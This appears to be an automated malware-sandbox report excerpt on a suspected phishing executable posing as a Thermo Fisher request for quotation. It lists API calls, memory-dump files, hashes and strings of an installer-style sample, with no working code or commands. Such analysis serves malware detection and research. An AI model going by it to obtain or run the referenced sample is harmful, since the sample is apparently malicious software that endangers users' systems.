                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                              • Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
                                              • Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                              • Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(?,004042CC), ref: 004044FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                              • Instruction ID: b0a400b6fcb01754b069d8f8c1c9044561b78d1e04efb9d0fff21555a903a89e
                                              • Opcode Fuzzy Hash: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                              • Instruction Fuzzy Hash: DFA00176444910ABDA02AB50EF0984ABB62FBE5701B519879A286510348B365820FB19
                                              APIs
                                                • Part of subcall function 004055D9: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
                                                • Part of subcall function 004055D9: lstrlenW.KERNEL32(0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
                                                • Part of subcall function 004055D9: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,0040341A,0040341A,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,00000000,0079A700,75F023A0), ref: 00405634
                                                • Part of subcall function 004055D9: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 00405646
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
                                                • Part of subcall function 004055D9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694
                                                • Part of subcall function 00405B37: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,1012,?), ref: 00405B60
                                                • Part of subcall function 00405B37: CloseHandle.KERNEL32(?,?,?,1012,?), ref: 00405B6D
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00402010
                                                • Part of subcall function 004069F3: WaitForSingleObject.KERNEL32(?,?,00000000,00000000,?,?,00401FC4,?,?,?,?,?,?), ref: 00406A04
                                                • Part of subcall function 004069F3: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A26
                                                • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                              • String ID:
                                              • API String ID: 2972824698-0
                                              • Opcode ID: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
                                              • Instruction ID: 31278e7032d6d459f1869afa1fc16bf8b986fef5f9539014001fbe5517bff4f7
                                              • Opcode Fuzzy Hash: 73d48fa51c11560306f2ecb512b72b21235bf248d8e77f8fe192972158bbb83d
                                              • Instruction Fuzzy Hash: 83F09672905511DBDB20BBA59A8999E7664DF0031CF21413FF202B25D5CABC4E41EA6E
                                              APIs
                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: b83d77026a0eef837aee2cf9f67490139d75f0ecd08a9ee5abe0a22eb8051c76
                                              • Instruction ID: e3f6ed4717897a2e6ecee164b05e04455bfe3191319e132c95f7d07364d35911
                                              • Opcode Fuzzy Hash: b83d77026a0eef837aee2cf9f67490139d75f0ecd08a9ee5abe0a22eb8051c76
                                              • Instruction Fuzzy Hash: 48D0A773A146008BD744EBB8BE8546F73E8FB903193204C3BD102E10E1E67CC911461C
                                              APIs
                                              • GlobalAlloc.KERNELBASE(?,?,6FE712DB,?,6FE7137F,00000019,6FE711CA,-000000A0), ref: 6FE712C5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true
                                              • Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: AllocGlobal
                                              • String ID:
                                              • API String ID: 3761449716-0
                                              • Opcode ID: 5c7f72851969baaf8b68c21a8381f2b15a619e4b75e93c89b9637ffc74310c67
                                              • Instruction ID: 50fd2404f3809d8114db822cfc8ff93c6ac2c6e8b732729983da9afd46ca937e
                                              • Opcode Fuzzy Hash: 5c7f72851969baaf8b68c21a8381f2b15a619e4b75e93c89b9637ffc74310c67
                                              • Instruction Fuzzy Hash: BCB01270600510DFEE00CB18EC0AF343AD6F703310F040001F600C1040C1206820C525
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 00404A13
                                              • SetWindowTextW.USER32(00000000,-007A9000), ref: 00404A3D
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404AEE
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404AF9
                                              • lstrcmpiW.KERNEL32(Call,007A1748,00000000,?,-007A9000), ref: 00404B2B
                                              • lstrcatW.KERNEL32(-007A9000,Call), ref: 00404B37
                                              • SetDlgItemTextW.USER32(?,000003FB,-007A9000), ref: 00404B49
                                                • Part of subcall function 00405B98: GetDlgItemTextW.USER32(?,?,00000400,00404B80), ref: 00405BAB
                                                • Part of subcall function 00406802: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00406865
                                                • Part of subcall function 00406802: CharNextW.USER32(?,?,?,00000000,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00406874
                                                • Part of subcall function 00406802: CharNextW.USER32(?,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe",75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00406879
                                                • Part of subcall function 00406802: CharPrevW.USER32(?,?,75F03420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 0040688C
                                              • GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,-007A9000,00000001,0079F718,-007A9000,-007A9000,000003FB,-007A9000), ref: 00404C0C
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C27
                                                • Part of subcall function 00404D80: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404E21
                                                • Part of subcall function 00404D80: wsprintfW.USER32 ref: 00404E2A
                                                • Part of subcall function 00404D80: SetDlgItemTextW.USER32(?,007A1748), ref: 00404E3D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: A$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call
                                              • API String ID: 2624150263-477905931
                                              • Opcode ID: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
                                              • Instruction ID: db18d61dd8e36d4389a3b44505c0f864e6ca322f8728bcf89e652d7f1c678b9a
                                              • Opcode Fuzzy Hash: d546a645e60e6957f04ba02b6a3eb8270b6339cfa2b22d8784a61d082e69804a
                                              • Instruction Fuzzy Hash: 25A185B1900208ABDB11AFA5DD45BEFB7B8EF84314F11403BF611B62D1D77C9A418B69
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404F58
                                              • GetDlgItem.USER32(?,00000408), ref: 00404F63
                                              • GlobalAlloc.KERNEL32(?,?), ref: 00404FAD
                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC4
                                              • SetWindowLongW.USER32(?,?,0040554D), ref: 00404FDD
                                              • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404FF1
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405003
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00405019
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405025
                                              • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00405037
                                              • DeleteObject.GDI32(00000000), ref: 0040503A
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405065
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405071
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510C
                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513C
                                                • Part of subcall function 00404508: SendMessageW.USER32(?,?,00000001,00404333), ref: 00404516
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405150
                                              • GetWindowLongW.USER32(?,?), ref: 0040517E
                                              • SetWindowLongW.USER32(?,?,00000000), ref: 0040518C
                                              • ShowWindow.USER32(?,00000005), ref: 0040519C
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405297
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FC
                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00405311
                                              • SendMessageW.USER32(?,00000420,00000000,?), ref: 00405335
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405355
                                              • ImageList_Destroy.COMCTL32(?), ref: 0040536A
                                              • GlobalFree.KERNEL32(?), ref: 0040537A
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F3
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040549C
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AB
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D6
                                              • ShowWindow.USER32(?,00000000), ref: 00405524
                                              • GetDlgItem.USER32(?,000003FE), ref: 0040552F
                                              • ShowWindow.USER32(00000000), ref: 00405536
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 2564846305-813528018
                                              • Opcode ID: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
                                              • Instruction ID: 3f60975f1bbea04172c566a814ac76c3bf8fe72ba7ce1bc18d7d222ec834a39f
                                              • Opcode Fuzzy Hash: 59a12151f687aa456750a72bebcaf03031b6b48c6fd142b985938e878f33cd06
                                              • Instruction Fuzzy Hash: B2027870900609AFDF20DF65DC85AAF7BB5FB85314F10816AFA10BA2E1D7798A41CF58
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404730
                                              • GetDlgItem.USER32(?,000003E8), ref: 00404744
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404761
                                              • GetSysColor.USER32(?), ref: 00404772
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404780
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040478E
                                              • lstrlenW.KERNEL32(?), ref: 00404793
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A0
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B5
                                              • GetDlgItem.USER32(?,0000040A), ref: 0040480E
                                              • SendMessageW.USER32(00000000), ref: 00404815
                                              • GetDlgItem.USER32(?,000003E8), ref: 00404840
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404883
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404891
                                              • SetCursor.USER32(00000000), ref: 00404894
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004048AD
                                              • SetCursor.USER32(00000000), ref: 004048B0
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048DF
                                              • SendMessageW.USER32(?,00000000,00000000), ref: 004048F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: F@$Call$N
                                              • API String ID: 3103080414-3713480610
                                              • Opcode ID: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
                                              • Instruction ID: 45fb83ade45cfc86163e6b15eb7062ba83955ff26de70ff6e3d1e782862a206c
                                              • Opcode Fuzzy Hash: cd157397fad3e9ba876edf76049899dad645a115876cfb537e4ce2c7fc417499
                                              • Instruction Fuzzy Hash: 1861A2B1900209BFDF10AF60DD85A6A7B69FB85314F00843AF705B62E0C778AD51CFA9
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
                                              • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE
                                                • Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
                                                • Part of subcall function 00405FA9: lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB
                                              • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
                                              • wsprintfA.USER32 ref: 00406219
                                              • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,?,007A55E8,?,?,?,?,?), ref: 00406254
                                              • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00406263
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629B
                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                              • GlobalFree.KERNEL32(00000000), ref: 00406302
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406309
                                                • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00406048
                                                • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
